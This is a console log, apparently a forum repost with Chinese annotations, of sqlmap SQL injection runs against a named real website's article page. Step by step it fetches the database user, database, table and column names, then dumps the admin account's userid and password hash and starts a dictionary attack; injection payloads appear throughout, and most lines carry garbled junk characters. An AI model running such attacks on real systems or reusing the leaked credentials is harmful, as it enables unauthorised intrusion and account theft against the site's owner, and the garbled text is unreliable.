D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 H9 \! B+ K+ H3 \7 z7 ?( a2 vms "Mysql" --current-user /* 注解:获取当前用户名称& Q6 V' M. L7 m
sqlmap/0.9 - automatic SQL injection and database takeover tool( D) l2 q% u/ z
http://sqlmap.sourceforge.net starting at: 16:53:54
1 m+ y" O) Q* D9 j0 d9 f0 `[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
$ y A* O# {0 j/ o session file
/ A- y4 U* ^0 e5 {& \, q# ?[16:53:54] [INFO] resuming injection data from session file9 {: C8 P& ?2 o2 N( X4 t
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
4 ?' `/ Q2 z6 i0 V; F9 N9 B[16:53:54] [INFO] testing connection to the target url
9 P7 k& u6 t2 k9 _- usqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 `! Q( x" Y/ u5 ~' Osts:- D9 e# c. s8 A( X
---# b* ]( m, f6 Y7 U: Q) ^
Place: GET
% L3 T9 ~5 ?, b8 xParameter: id
3 y& F9 _) r! x4 o1 e$ x X3 v Type: boolean-based blind
/ P0 h% n# l! p: d m Title: AND boolean-based blind - WHERE or HAVING clause' S: _6 n9 {5 S7 M A$ i
Payload: id=276 AND 799=799
0 D$ X/ w9 K( H Type: error-based( ~9 B# P# b2 ]0 P/ f
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% G G/ n! l. N( p2 S Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, E$ Z* P) b- Z; Z3 b
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 e( r. B, M( F8 f, I),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% e! ~5 s# Z- k7 H, s3 Q
Type: UNION query0 {& M4 f3 r6 V
Title: MySQL UNION query (NULL) - 1 to 10 columns
+ ]# S# c- Y! ]! W; M9 A4 G Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# i4 d3 S- g0 L: I$ ]1 V! U
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. Q2 K) w- L+ `+ b* r6 M7 e, V8 C: XCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; Y) W2 r4 \3 q Type: AND/OR time-based blind
0 R8 _8 N0 H$ `/ J9 \ Title: MySQL > 5.0.11 AND time-based blind- k' P, J! _' G- r- Q
Payload: id=276 AND SLEEP(5)
4 w5 b! K: e |! Y1 L% j4 x& l---
/ x4 ? _9 Z4 K1 U' T% ^+ ~[16:53:55] [INFO] the back-end DBMS is MySQL
; t7 g: C1 S" \' zweb server operating system: Windows( w* U" N$ Q2 O
web application technology: Apache 2.2.11, PHP 5.3.0+ ?3 {- {& U4 Q3 p
back-end DBMS: MySQL 5.0
- v: f# U& B7 e9 }+ s[16:53:55] [INFO] fetching current user
, s$ \8 @) M& h: O. D" I9 Lcurrent user: 'root@localhost'
. f2 T! |% Q2 e* v8 F+ \[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* e# a) M" A) G
tput\www.wepost.com.hk' shutting down at: 16:53:58$ d8 A7 e* s4 Q# f5 h- p
* ? e0 G' B1 L4 C6 _D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# Q( w5 ~5 R) O$ k1 E: e8 j* O8 v
ms "Mysql" --current-db /*当前数据库
; u8 s! K: f6 K) ?4 E. V7 w# e1 r sqlmap/0.9 - automatic SQL injection and database takeover tool7 B0 ?/ B ^/ N: t- {' X W( u
http://sqlmap.sourceforge.net starting at: 16:54:162 ]! V' G8 G: g% d1 j4 o
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: _8 K" [) O8 v session file
3 @# L S7 F6 u$ e7 R[16:54:16] [INFO] resuming injection data from session file, g. e& P) U/ N! \! Y/ M& e
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file C0 |& {/ X3 b
[16:54:16] [INFO] testing connection to the target url/ s- h& Q4 h& k! ?- |3 _
sqlmap identified the following injection points with a total of 0 HTTP(s) reque; _3 _7 v6 l; R- C0 T) T. g4 d* o) |
sts:
3 [4 g$ |3 D9 R0 \0 S- L---
# x& A* }- u: c) LPlace: GET
0 ~. [2 k+ G: V C4 L, n4 m5 O' {- LParameter: id* d4 O7 S9 d4 U, y% D- N
Type: boolean-based blind
8 c+ R7 J& i U v) C: n F Title: AND boolean-based blind - WHERE or HAVING clause/ l$ v9 W) F, d
Payload: id=276 AND 799=799
' ^' U$ O3 E# U Type: error-based8 E0 f& q( d6 N. E8 `
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, a* v8 y2 @# a: [* z' o2 ~ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
+ } h s* k0 |' N7 B120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 n, p7 x# T. Z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ X, X/ S7 K/ P3 E) T2 j
Type: UNION query" d A0 x( }: V2 G# E: K4 v; t3 Q
Title: MySQL UNION query (NULL) - 1 to 10 columns; o# E6 L* @( }
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 R l8 ]3 s) H: {& Y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& t9 \# {0 h- _1 O
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% Z) R) N) s% K( U& {- R
Type: AND/OR time-based blind/ r$ e# I2 w$ C- q- B' k
Title: MySQL > 5.0.11 AND time-based blind
7 p& ~# v0 m" k( P" R5 K, j Payload: id=276 AND SLEEP(5): k [, n0 z* f# O$ y- o* z+ \) s
---
( J# K' y& y+ I8 U[16:54:17] [INFO] the back-end DBMS is MySQL
/ t. G: B( I; [$ w4 aweb server operating system: Windows
! o; I F- s8 h6 Dweb application technology: Apache 2.2.11, PHP 5.3.0. T, x# ~3 R6 z- Z
back-end DBMS: MySQL 5.0
) n( y* f: }5 b0 e[16:54:17] [INFO] fetching current database' U% x- Q- [3 `. l
current database: 'wepost'
`- W7 u5 R2 `[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou8 Q8 S+ w1 ?( ~( H2 Y/ z& x8 C$ H
tput\www.wepost.com.hk' shutting down at: 16:54:18
* ~4 A3 `# l. z- |: jD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 W3 F' F7 U8 a2 ~. N/ M
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
! R! w" `( D) E8 n6 S0 d5 R sqlmap/0.9 - automatic SQL injection and database takeover tool* J" H# g, N& o0 C- Q! G
http://sqlmap.sourceforge.net starting at: 16:55:25
5 H8 r! a* }& V2 f[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as2 O# o" ?7 A) l. Q- f3 m. @
session file
0 R) @9 {+ V1 u5 h( F/ B; c* I[16:55:25] [INFO] resuming injection data from session file
2 e& E2 u% x% M8 @: l6 {[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file& [6 ~1 A/ e8 Z# G' V# x
[16:55:25] [INFO] testing connection to the target url
0 O9 y$ y- T! J: w0 Bsqlmap identified the following injection points with a total of 0 HTTP(s) reque1 d. u; K' F4 F3 u
sts:
! ]/ N9 R1 e% W---
2 @1 }, \! g2 C1 v; ^- T- D4 L! kPlace: GET
, z; i; f; M2 Z- u5 v+ _Parameter: id& W4 ^- J% ^: y& O
Type: boolean-based blind- S( e! {, f8 @2 c: @
Title: AND boolean-based blind - WHERE or HAVING clause, N" f7 V- {, d& a- [0 A* K( d: ~
Payload: id=276 AND 799=7994 R! I: a6 B! \" T
Type: error-based
0 E) E( Q7 G; \. N1 @' X Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 u5 ?: l9 T9 w9 h! i/ X. E Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
# {- Y4 Z! W, V n120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 O# {2 b1 O! }# f) o# k5 x4 k),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
. l \/ F/ x0 v9 p. f; i Type: UNION query4 a+ l6 y0 Y7 i9 V
Title: MySQL UNION query (NULL) - 1 to 10 columns
1 U% x- V+ L% e* N( r Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% N- Z5 d) ?# Q6 K* A: w0 {6 H" q
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),2 }& T9 W- [6 h" C$ {. j
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ C( Y: l$ y0 i! \, H Type: AND/OR time-based blind
1 F8 z' A) I# I; F- ?$ b& u Title: MySQL > 5.0.11 AND time-based blind
& i1 c/ i9 I, Z, }3 {% l$ t# O Payload: id=276 AND SLEEP(5)
5 U* [* ^% A0 P$ j8 [8 K' W( W( h---
0 F, r' {4 Q* R1 A" u$ u[16:55:26] [INFO] the back-end DBMS is MySQL" Z7 z% z+ q6 t* z& w
web server operating system: Windows9 b0 X: V" S! M4 i+ s4 ]8 y+ G
web application technology: Apache 2.2.11, PHP 5.3.0
5 Z6 o* Q0 K+ E. o$ d+ x$ o8 j0 A# Qback-end DBMS: MySQL 5.08 O$ J; ?) R6 Z/ r0 @
[16:55:26] [INFO] fetching tables for database 'wepost'3 \4 S( k c( m' _ w
[16:55:27] [INFO] the SQL query used returns 6 entries
% i" T. |4 K* I3 V5 hDatabase: wepost/ U _3 E6 Y% ^: e
[6 tables], H' C1 F. X [3 X
+-------------+- s' f: }6 v) P. v( y/ n
| admin |
4 p0 l$ h. {: ]% B% k$ C| article |. X' o+ Q8 x) W4 x* Z
| contributor |" ?" r2 s$ \$ y( t8 ~( \: {
| idea |
9 ]/ Z0 z$ P+ ?% l| image |
' _4 g- h |# B3 Z6 b% N9 i. t" k5 g| issue |; T% W& V: p2 k* D0 i$ R( k
+-------------+5 w9 U) e+ u% T8 h
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
0 h1 O2 Z* j! h8 i! K3 vtput\www.wepost.com.hk' shutting down at: 16:55:33
1 \) |8 P) T- I1 g
6 g) R. m: ^, q( {D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ V. h( Y" Q& ?* L- zms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名# q9 W+ \: ?; V- y! u1 u/ U8 b
sqlmap/0.9 - automatic SQL injection and database takeover tool9 h; s# V! u( d% E. _6 `# _3 w
http://sqlmap.sourceforge.net starting at: 16:56:06
. C7 n) N5 d8 ~4 o z! [sqlmap identified the following injection points with a total of 0 HTTP(s) reque5 y3 g( c% I1 K; p L( F
sts:6 P- Y* O! `4 h9 e
---
3 E5 D4 r( B1 L0 G; fPlace: GET
+ ` R# r4 ~# X4 o! e7 e5 m$ IParameter: id( t6 @& ^0 w) U" Q
Type: boolean-based blind
S3 K' W# f" r& L Title: AND boolean-based blind - WHERE or HAVING clause9 L, b( H+ i9 G! Y8 _8 L& f
Payload: id=276 AND 799=799
) P4 a8 v) W+ C( |! [ [$ w Type: error-based* E; f- M( w/ U& K# ~ U
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
& c% ]0 W6 @3 F Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 U f# p; C2 h0 c6 j4 L120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ W9 o5 D+ }( F/ n) Z7 S
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). X$ N; m$ z; l. l9 z. u4 O' W
Type: UNION query. `! `1 h) _. \0 \' c
Title: MySQL UNION query (NULL) - 1 to 10 columns2 t( ]7 q4 c# a% r# C( q5 I
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR n) `% X: `9 l4 |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 ]! N3 V" s0 ]3 D `
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
( q4 [8 G" N. O6 m& C1 [+ b Type: AND/OR time-based blind) C+ D* e( Y) G) w9 \$ v9 Y1 C
Title: MySQL > 5.0.11 AND time-based blind4 r6 b, s4 A( e/ P: Q, W: B* x( E3 T! G
Payload: id=276 AND SLEEP(5) ~6 w- U% p4 V4 V6 H) Q) t; @
---
# C7 W C8 O7 p: p, Q, U+ Cweb server operating system: Windows! {/ G( o" j, o$ h8 k9 f
web application technology: Apache 2.2.11, PHP 5.3.0
3 @+ V& |* O' [7 ^7 H# m9 tback-end DBMS: MySQL 5.0
1 d7 u0 ^: y* ~. X" }, Q# ][16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se4 p0 R/ }+ h. x) B# d/ H
ssion': wepost, wepost) T! H: d* N5 c7 u! v* ], m I
Database: wepost
0 Q p/ n( D3 I3 j# kTable: admin2 `( S5 |! B# R: K
[4 columns]7 H( f& i. M( G% a- r) `, A$ Q
+----------+-------------+
/ e& [) J4 V4 r( a m/ t [ _5 || Column | Type |
, h, i3 P5 [4 \2 d; Z5 e) w. F5 _+----------+-------------+& u. P. ]9 m) U( e* k8 a
| id | int(11) |
" H. B- h2 h& h/ V| password | varchar(32) |
- c4 P: @4 k5 O6 {) P2 B| type | varchar(10) |2 C, k! b! j7 x7 \* Y& F; y
| userid | varchar(20) |
$ q$ x/ |: K- u9 m+----------+-------------+
$ f. z: s6 ~! K& y& p shutting down at: 16:56:197 K5 s, K/ E6 j. q" }
; G2 A/ `3 l x8 B. J- N) VD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ \% b3 ?2 m, e5 l, }% M
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
, @ }: F0 B: I9 c$ _* `) S" c sqlmap/0.9 - automatic SQL injection and database takeover tool
5 h3 N9 J- e# N E3 ?7 p" A2 T. p http://sqlmap.sourceforge.net starting at: 16:57:14
3 z, f9 E% F( k. j5 Wsqlmap identified the following injection points with a total of 0 HTTP(s) reque
3 P& G' [ y' {$ F* b: q; `0 Asts:
+ J+ D4 Z5 d2 d, c9 q- B k" m---" z# Q- Y. c; h! W
Place: GET
" r' K7 H) \2 O) t. u6 j6 Q7 K9 }Parameter: id5 z9 R: |' [' n8 `' I2 o: j
Type: boolean-based blind
6 J! ?6 v8 U/ q6 l# \. P7 e Title: AND boolean-based blind - WHERE or HAVING clause7 S" D4 }9 h7 E
Payload: id=276 AND 799=799
8 l7 S1 J1 v5 {% e, f+ V Type: error-based
6 u- I* R. J8 ^; q1 q/ _ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 P8 g* x! \3 @' v. m
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: B/ F: l+ g* ]6 e+ D: w, Q0 |) J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
: n7 Q' p7 S3 t5 g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)* H# ^, C: c6 D/ G
Type: UNION query! S+ n2 J/ }) W- x- G( G$ o3 V5 \
Title: MySQL UNION query (NULL) - 1 to 10 columns/ [# [0 m9 m; V# \* s! q
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& h- i- `/ G8 G2 f
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 ] e) w1 @5 g* k p" P+ p7 O: VCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 |/ _8 ?/ u% _ Type: AND/OR time-based blind
' v3 W$ Y: n( X! x Title: MySQL > 5.0.11 AND time-based blind2 \9 Q" [, ~1 B+ Z+ T% N
Payload: id=276 AND SLEEP(5)4 k; j6 X+ m4 |4 C j+ B/ I2 S* o
---
d& a$ p8 C8 t) k6 L8 tweb server operating system: Windows
?: k. D+ R8 q* N, eweb application technology: Apache 2.2.11, PHP 5.3.0
8 o( f( v2 d0 F! q+ Aback-end DBMS: MySQL 5.0
8 I4 S( y: D1 vrecognized possible password hash values. do you want to use dictionary attack o" R' K, I- {) t0 R; o# N$ x
n retrieved table items? [Y/n/q] y" w! h( P4 U8 p4 [$ W& Q
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
q# p* M. V4 q; u& F7 wdo you want to use common password suffixes? (slow!) [y/N] y
& I9 ?2 \4 D5 l/ g/ [2 s2 LDatabase: wepost) x7 U$ w3 ^* k( X) u
Table: admin
* A# c7 E: L9 ^6 @" ?; R" Y2 Y+ b[1 entry]
& f# b' }% a1 P3 ]+----------------------------------+------------+' B3 S9 a5 W* g3 O; q6 p0 S
| password | userid |( ^. c3 u1 {/ K Z* }
+----------------------------------+------------+
# }; w5 r/ L+ a+ r3 c( B2 a| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
, n3 [7 Y' u6 X/ Q0 S& M+----------------------------------+------------+
% s" S$ f' ?0 r shutting down at: 16:58:14) r5 E q, b2 _1 g6 F
, E6 v$ Q1 r# Y. A- SD:\Python27\sqlmap> |